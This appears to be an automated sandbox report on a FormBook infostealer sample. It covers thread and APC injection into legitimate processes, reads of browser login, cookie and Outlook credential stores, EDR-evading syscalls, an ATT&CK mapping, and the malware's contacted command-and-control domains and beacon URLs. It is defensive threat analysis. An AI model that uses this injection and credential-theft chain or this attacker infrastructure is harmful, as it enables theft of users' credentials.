                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeSection loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeSection loaded: NULL target: C:\Windows\SysWOW64\cacls.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeThread register set: target process: 7488Jump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeThread register set: target process: 7488Jump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeThread register set: target process: 6088Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeThread APC queued: target process: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeJump to behavior
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeProcess created: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe "C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe"Jump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeProcess created: C:\Windows\SysWOW64\cacls.exe "C:\Windows\SysWOW64\cacls.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: RAVCpl64.exe, 00000003.00000002.183786660977.0000000001010000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000003.00000000.179162753053.0000000001010000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: #Program Manager|$iB=
                Source: RAVCpl64.exe, 00000003.00000002.183786660977.0000000001010000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000003.00000000.179162753053.0000000001010000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: RAVCpl64.exe, 00000003.00000002.183786660977.0000000001010000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000003.00000000.179162753053.0000000001010000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: RAVCpl64.exe, 00000003.00000002.183786660977.0000000001010000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000003.00000000.179162753053.0000000001010000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeQueries volume information: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.Pp7OXMFwqhXKx5Y.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.Pp7OXMFwqhXKx5Y.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.179274577947.0000000005D30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.182790212280.0000000003470000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.179229670326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.182790291540.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\cacls.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\cacls.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.Pp7OXMFwqhXKx5Y.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.Pp7OXMFwqhXKx5Y.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.179274577947.0000000005D30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.182790212280.0000000003470000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.179229670326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.182790291540.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                Services File Permissions Weakness                		412
                Process Injection                		1
                Masquerading                		1
                OS Credential Dumping                		121
                Security Software Discovery                		Remote Services1
                Email Collection                		1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/Job1
                DLL Side-Loading                		1
                Abuse Elevation Control Mechanism                		1
                Disable or Modify Tools                		LSASS Memory2
                Process Discovery                		Remote Desktop Protocol1
                Archive Collected Data                		5
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                Services File Permissions Weakness                		41
                Virtualization/Sandbox Evasion                		Security Account Manager41
                Virtualization/Sandbox Evasion                		SMB/Windows Admin Shares1
                Data from Local System                		5
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                DLL Side-Loading                		412
                Process Injection                		NTDS1
                Application Window Discovery                		Distributed Component Object ModelInput Capture5
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                File and Directory Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Abuse Elevation Control Mechanism                		Cached Domain Credentials113
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                Obfuscated Files or Information                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                Services File Permissions Weakness                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
                Software Packing                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                DLL Side-Loading                		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1567413 Sample: Pp7OXMFwqhXKx5Y.exe Startdate: 03/12/2024 Architecture: WINDOWS Score: 100 34 www.juewucangku.xyz 2->34 36 www.foggvdqutxzgea.xyz 2->36 38 19 other IPs or domains 2->38 42 Suricata IDS alerts for network traffic 2->42 44 Multi AV Scanner detection for submitted file 2->44 46 Yara detected FormBook 2->46 50 3 other signatures 2->50 10 Pp7OXMFwqhXKx5Y.exe 3 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 36->48 process4 file5 26 C:\Users\user\...\Pp7OXMFwqhXKx5Y.exe.log, ASCII 10->26 dropped 60 Injects a PE file into a foreign processes 10->60 62 Switches to a custom stack to bypass stack traces 10->62 14 Pp7OXMFwqhXKx5Y.exe 10->14         started        signatures6 process7 signatures8 64 Modifies the context of a thread in another process (thread injection) 14->64 66 Maps a DLL or memory area into another process 14->66 68 Queues an APC in another process (thread injection) 14->68 70 Found direct / indirect Syscall (likely to bypass EDR) 14->70 17 RAVCpl64.exe 14->17 injected process9 dnsIp10 28 www.brickhills.site 103.224.182.242, 49788, 49789, 49790 TRELLIAN-AS-APTrellianPtyLimitedAU Australia 17->28 30 0be.info 173.0.157.187, 49796, 49797, 49798 SERVERS-COMUS United States 17->30 32 13 other IPs or domains 17->32 40 Found direct / indirect Syscall (likely to bypass EDR) 17->40 21 cacls.exe 13 17->21         started        signatures11 process12 signatures13 52 Tries to steal Mail credentials (via file / registry access) 21->52 54 Tries to harvest and steal browser information (history, passwords, etc) 21->54 56 Modifies the context of a thread in another process (thread injection) 21->56 58 2 other signatures 21->58 24 firefox.exe 21->24         started        process14

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                Pp7OXMFwqhXKx5Y.exe100%Joe Sandbox ML
                Pp7OXMFwqhXKx5Y.exe45%ReversingLabsByteCode-MSIL.Backdoor.FormBook

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                No Antivirus matches

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                88rtp.biz
                		172.96.191.39
                		truetrue
                  		unknown
                  www.eichner.pro
                  		89.31.143.90
                  		truetrue
                    		unknown
                    www.goldbracelet.top
                    		172.67.201.49
                    		truetrue
                      		unknown
                      www.224466.top
                      		45.197.47.177
                      		truetrue
                        		unknown
                        0be.info
                        		173.0.157.187
                        		truetrue
                          		unknown
                          www.smartgov.shop
                          		13.248.169.48
                          		truetrue
                            		unknown
                            www.juewucangku.xyz
                            		8.136.96.106
                            		truetrue
                              		unknown
                              www.brickhills.site
                              		103.224.182.242
                              		truetrue
                                		unknown
                                hayaniya.org
                                		192.185.147.100
                                		truetrue
                                  		unknown
                                  www.kubex.dev
                                  		217.160.0.183
                                  		truetrue
                                    		unknown
                                    www.epicurecooks.world
                                    		208.91.197.27
                                    		truetrue
                                      		unknown
                                      nng83.top
                                      		38.47.233.4
                                      		truetrue
                                        		unknown
                                        www.dialogpriest.online
                                        		176.31.209.107
                                        		truetrue
                                          		unknown
                                          sido247.pro
                                          		84.32.84.32
                                          		truetrue
                                            		unknown
                                            www.glowups.life
                                            		209.74.79.42
                                            		truetrue
                                              		unknown
                                              www.0be.info
                                              		unknown
                                              		unknownfalse
                                                		unknown
                                                www.foggvdqutxzgea.xyz
                                                		unknown
                                                		unknowntrue
                                                  		unknown
                                                  www.sido247.pro
                                                  		unknown
                                                  		unknownfalse
                                                    		unknown
                                                    www.88rtp.biz
                                                    		unknown
                                                    		unknownfalse
                                                      		unknown
                                                      www.nng83.top
                                                      		unknown
                                                      		unknownfalse
                                                        		unknown
                                                        www.hayaniya.org
                                                        		unknown
                                                        		unknownfalse
                                                          		unknown

                                                          Contacted URLs

                                                          NameMaliciousAntivirus DetectionReputation
                                                          http://www.eichner.pro/og0p/true
                                                            		unknown
                                                            http://www.brickhills.site/vwn2/true
                                                              		unknown
                                                              http://www.nng83.top/mg8c/true
                                                                		unknown
                                                                http://www.224466.top/8orf/true
                                                                  		unknown
                                                                  http://www.0be.info/8h0h/true
                                                                    		unknown
                                                                    http://www.epicurecooks.world/mdkc/true
                                                                      		unknown
                                                                      http://www.88rtp.biz/oz0e/?pluxVm=N0iBPOr2h1wf3hrk0fV7bCYuQaQcnemlKlX+67l0LxDwIz/NET6JyzgCPnJBSBJZztg4pX1Iwr0Nd76JZuhGak0dZt9NjSAeSo6fySf0UlwbimsbHDdeRZs=&Z1EO=OvfHeluUytrue
                                                                        		unknown
                                                                        http://www.224466.top/8orf/?pluxVm=yDQ89DLfYgJiEyke7+6q5gE87/fs/XemaXtjJXohmXUOdwNzAwGJy6nqls5iDTVnp9Zi+kacGLaYAX6Ad+cHYYESeoueNmRKrwXa18136rVeVa07ORWAOLw=&Z1EO=OvfHeluUytrue
                                                                          		unknown
                                                                          http://www.smartgov.shop/1cwp/true
                                                                            		unknown
                                                                            http://www.glowups.life/dheh/true
                                                                              		unknown
                                                                              http://www.epicurecooks.world/mdkc/?pluxVm=yWWHbhCahbG3DdaBnt9NrGvMUCSQc4g2Tqe6SUjOSsODgr6CFa5SJdyjtzT5mznodS2lvT8/GpN3gvUqymh3/8TyFQ0rIiTFrx443/jhZTAx0fULTMMcMck=&Z1EO=OvfHeluUytrue
                                                                                		unknown
                                                                                http://www.sido247.pro/073p/true
                                                                                  		unknown
                                                                                  http://www.juewucangku.xyz/mia8/true
                                                                                    		unknown
                                                                                    http://www.dialogpriest.online/7znk/true
                                                                                      		unknown
                                                                                      http://www.hayaniya.org/vpwx/?pluxVm=QVDEbR6rh5hXI7Ts6cB6silFglbuflfjHrG0P1AfCwx+KCDVCLlnycIybt7pD06IHRHaJm25c0tlog+zyXtoPLPq9cOgZC1PjOnv8m1FSTaOvxyioepA8aM=&Z1EO=OvfHeluUytrue
                                                                                        		unknown
                                                                                        http://www.hayaniya.org/vpwx/true
                                                                                          		unknown
                                                                                          http://www.brickhills.site/vwn2/?Z1EO=OvfHeluUy&pluxVm=8b9RKtQSBHH07PxtYsipjL/lqfXqYX+jQmAZaw9GROHGYV74Mu7xY5rUUGbBS35lPyHtHPQD+8VPnbju2HtxZfcyuqMzjQoAFmm58sa9OXwe8h9QCPhjB/0=true
                                                                                            		unknown
                                                                                            http://www.juewucangku.xyz/mia8/?pluxVm=lJqwuwutw0TxfZ38sJgHJ7uqXbvMJU6pA/kgjN31XYZ5TRzvlECqmYueWqhH+dns4k5MWxqP8Bok6NcIC1536fve9u1GdSOEvFZBDrTYEySAKG7uhWgC+P8=&Z1EO=OvfHeluUytrue
                                                                                              		unknown
                                                                                              http://www.goldbracelet.top/qrpv/?Z1EO=OvfHeluUy&pluxVm=WiX0LzPqOnM4b37+7/q2MnJgJJwmlCG/8poUwA5NsFkBp/VurdzYoSVVPF8rA/Ka5BkZn+mZS0ORkGe6TXFOOAiLIJoZGeMwExFXk2ddigf2T3UmxoiawIQ=true
                                                                                                		unknown
                                                                                                http://www.nng83.top/mg8c/?pluxVm=rjBLh9a8fZJRcQu9K1C3LAtp+/ShEoEfzH3ui2xMInNHtYlxt8Nl0C2ZPsNy1cCyYgBvBEXXCVeazEdoFLasWgZ3AJaOWiiv1TsNcWo9tyTPmHKnoGX/TSk=&Z1EO=OvfHeluUytrue
                                                                                                  		unknown
                                                                                                  http://www.kubex.dev/o5mm/true
                                                                                                    		unknown
                                                                                                    http://www.smartgov.shop/1cwp/?Z1EO=OvfHeluUy&pluxVm=sIFdgnO3FyIHooXZAGWnPd64nEiNYbQbKjddbfNFYhaUQRED9832NCT0LRXwdwmN50zS64Z/ENDcZJBcOGN8yjbqMhS05UVN1tB36ILI/fWY5OM6Vh1joIo=true
                                                                                                      		unknown
                                                                                                      http://www.goldbracelet.top/qrpv/true
                                                                                                        		unknown
                                                                                                        http://www.kubex.dev/o5mm/?pluxVm=52ZaOoJJHsYFYpcE8OJe6kaaR+Ibp2Nxq28CYNd7tHRxqCukViCUoHxjhmN2/g+W5SkTzZJsaEIA3pVY9O1vDv+SN/8yFpfSlnbOuEouoKz6AG71fS9yZK8=&Z1EO=OvfHeluUytrue
                                                                                                          		unknown
                                                                                                          http://www.eichner.pro/og0p/?pluxVm=aYNz5vX3IaeBLII2gGf9eURLdfN+pzrBFxzqHFB0Zc0E767K5MaAH/EqLovM7A815HxojS38W68HbT3JNl21N4jIU1lh5jKS99Zmbqcxop+R6eeWU//8U3E=&Z1EO=OvfHeluUytrue
                                                                                                            		unknown
                                                                                                            http://www.sido247.pro/073p/?pluxVm=NsdLHLYUe9sblrm0I+Crv144tHMQQbz/4RSieCn+7DwPKByw7jhxCyJ0LTJMQHRDPlmDRdKjKllFY9ccUXh843okMet3hg+QsBhX3tP/6BR9rZiNBzb3ESI=&Z1EO=OvfHeluUytrue
                                                                                                              		unknown
                                                                                                              http://www.dialogpriest.online/7znk/?Z1EO=OvfHeluUy&pluxVm=HSNOOCSycaWbpWp1pFuTHgyNeMyGT259cyc1jurPotVrvnXLICbtqfVvbaWKwlIlASBzdIxRFAa/wDiZdCYNsQsDHbsFXQKeKhShRpSMwKmQ7kRuiU3WeuA=true
                                                                                                                		unknown
                                                                                                                http://www.glowups.life/dheh/?pluxVm=6JcMAOZ0kkEuPLPobYSFFslgEkquVWiK5Nqk+SkmZf4Wc9f19ayTyDiVFSf9h78jkWY5XnirO34u2f/fghaoX1igb+ZsamnQxKAe0eVMQ+zxkvaWI9vtOSA=&Z1EO=OvfHeluUytrue
                                                                                                                  		unknown

                                                                                                                  URLs from Memory and Binaries

                                                                                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                                                                                  https://duckduckgo.com/chrome_newtabcacls.exe, 00000004.00000003.179416057961.000000000823B000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000004.00000002.182792565138.00000000081CF000.00000004.00000020.00020000.00000000.sdmp, G8uE-69OL.4.drfalse
                                                                                                                    		high
                                                                                                                    https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/searchcacls.exe, 00000004.00000003.179416057961.000000000823B000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000004.00000002.182792565138.00000000081CF000.00000004.00000020.00020000.00000000.sdmp, G8uE-69OL.4.drfalse
                                                                                                                      		high
                                                                                                                      https://dts.gnpge.comcacls.exe, 00000004.00000002.182791208626.000000000476C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                        		unknown
                                                                                                                        https://duckduckgo.com/ac/?q=G8uE-69OL.4.drfalse
                                                                                                                          		high
                                                                                                                          https://cdn.consentmanager.netRAVCpl64.exe, 00000003.00000002.183800347636.000000000755C000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000004.00000002.182791208626.000000000476C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2RAVCpl64.exe, 00000003.00000002.183800347636.000000000755C000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000004.00000002.182792439928.0000000006720000.00000004.00000800.00020000.00000000.sdmp, cacls.exe, 00000004.00000002.182791208626.000000000476C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://i2.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpgRAVCpl64.exe, 00000003.00000002.183800347636.000000000755C000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000004.00000002.182792439928.0000000006720000.00000004.00000800.00020000.00000000.sdmp, cacls.exe, 00000004.00000002.182791208626.000000000476C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://www.brickhills.siteRAVCpl64.exe, 00000003.00000002.183789647493.0000000003536000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                                                  		unknown
                                                                                                                                  https://sedo.com/checkdomainoffer.php?language=es&domain=dialogpriest.online&partnerid=318876RAVCpl64.exe, 00000003.00000002.183800347636.0000000008510000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000004.00000002.182791208626.0000000005720000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://i2.cdn-image.com/__media__/pics/28903/search.png)RAVCpl64.exe, 00000003.00000002.183800347636.000000000755C000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000004.00000002.182792439928.0000000006720000.00000004.00000800.00020000.00000000.sdmp, cacls.exe, 00000004.00000002.182791208626.000000000476C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2RAVCpl64.exe, 00000003.00000002.183800347636.000000000755C000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000004.00000002.182792439928.0000000006720000.00000004.00000800.00020000.00000000.sdmp, cacls.exe, 00000004.00000002.182791208626.000000000476C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://www.Epicurecooks.worldRAVCpl64.exe, 00000003.00000002.183800347636.000000000755C000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000004.00000002.182792439928.0000000006720000.00000004.00000800.00020000.00000000.sdmp, cacls.exe, 00000004.00000002.182791208626.000000000476C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                          		unknown
                                                                                                                                          http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otfRAVCpl64.exe, 00000003.00000002.183800347636.000000000755C000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000004.00000002.182792439928.0000000006720000.00000004.00000800.00020000.00000000.sdmp, cacls.exe, 00000004.00000002.182791208626.000000000476C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://www.wesped.com/RAVCpl64.exe, 00000003.00000002.183800347636.0000000008510000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000004.00000002.182791208626.0000000005720000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                              		unknown
                                                                                                                                              https://beian.miit.gov.cn/RAVCpl64.exe, 00000003.00000002.183800347636.00000000086A2000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000004.00000002.182791208626.00000000058B2000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=cacls.exe, 00000004.00000003.179416057961.000000000823B000.00000004.00000020.00020000.00000000.sdmp, G8uE-69OL.4.drfalse
                                                                                                                                                  		high
                                                                                                                                                  http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otfRAVCpl64.exe, 00000003.00000002.183800347636.000000000755C000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000004.00000002.182792439928.0000000006720000.00000004.00000800.00020000.00000000.sdmp, cacls.exe, 00000004.00000002.182791208626.000000000476C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    http://www.epicurecooks.world/__media__/design/underconstructionnotice.php?d=epicurecooks.worldRAVCpl64.exe, 00000003.00000002.183800347636.000000000755C000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000004.00000002.182792439928.0000000006720000.00000004.00000800.00020000.00000000.sdmp, cacls.exe, 00000004.00000002.182791208626.000000000476C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                                      		unknown
                                                                                                                                                      http://www.epicurecooks.world/Epicure_Market_Miami_Beach.cfm?fp=oRjqTKvNE1HJY5QlICDKPU%2FlUKBvBjy%2FRAVCpl64.exe, 00000003.00000002.183800347636.000000000755C000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000004.00000002.182792439928.0000000006720000.00000004.00000800.00020000.00000000.sdmp, cacls.exe, 00000004.00000002.182791208626.000000000476C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                                        		unknown
                                                                                                                                                        http://www.epicurecooks.world/px.js?ch=2cacls.exe, 00000004.00000002.182792439928.0000000006720000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          		unknown
                                                                                                                                                          http://www.epicurecooks.world/px.js?ch=1cacls.exe, 00000004.00000002.182792439928.0000000006720000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            		unknown
                                                                                                                                                            http://www.epicurecooks.world/Victorian_Epicure.cfm?fp=oRjqTKvNE1HJY5QlICDKPU%2FlUKBvBjy%2FRk5sF9Bh%RAVCpl64.exe, 00000003.00000002.183800347636.000000000755C000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000004.00000002.182792439928.0000000006720000.00000004.00000800.00020000.00000000.sdmp, cacls.exe, 00000004.00000002.182791208626.000000000476C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                                              		unknown
                                                                                                                                                              http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eotRAVCpl64.exe, 00000003.00000002.183800347636.000000000755C000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000004.00000002.182792439928.0000000006720000.00000004.00000800.00020000.00000000.sdmp, cacls.exe, 00000004.00000002.182791208626.000000000476C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                http://www.epicurecooks.world/Epicure_Selections.cfm?fp=oRjqTKvNE1HJY5QlICDKPU%2FlUKBvBjy%2FRk5sF9BhRAVCpl64.exe, 00000003.00000002.183800347636.000000000755C000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000004.00000002.182792439928.0000000006720000.00000004.00000800.00020000.00000000.sdmp, cacls.exe, 00000004.00000002.182791208626.000000000476C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                                                  		unknown
                                                                                                                                                                  http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefixRAVCpl64.exe, 00000003.00000002.183800347636.000000000755C000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000004.00000002.182792439928.0000000006720000.00000004.00000800.00020000.00000000.sdmp, cacls.exe, 00000004.00000002.182791208626.000000000476C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    http://224466.topcacls.exe, 00000004.00000002.182791208626.00000000058B2000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                                                      		unknown
                                                                                                                                                                      http://www.epicurecooks.world/Gourmet.cfm?fp=oRjqTKvNE1HJY5QlICDKPU%2FlUKBvBjy%2FRk5sF9Bh%2Fbshv%2FlRAVCpl64.exe, 00000003.00000002.183800347636.000000000755C000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000004.00000002.182792439928.0000000006720000.00000004.00000800.00020000.00000000.sdmp, cacls.exe, 00000004.00000002.182791208626.000000000476C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                                                        		unknown
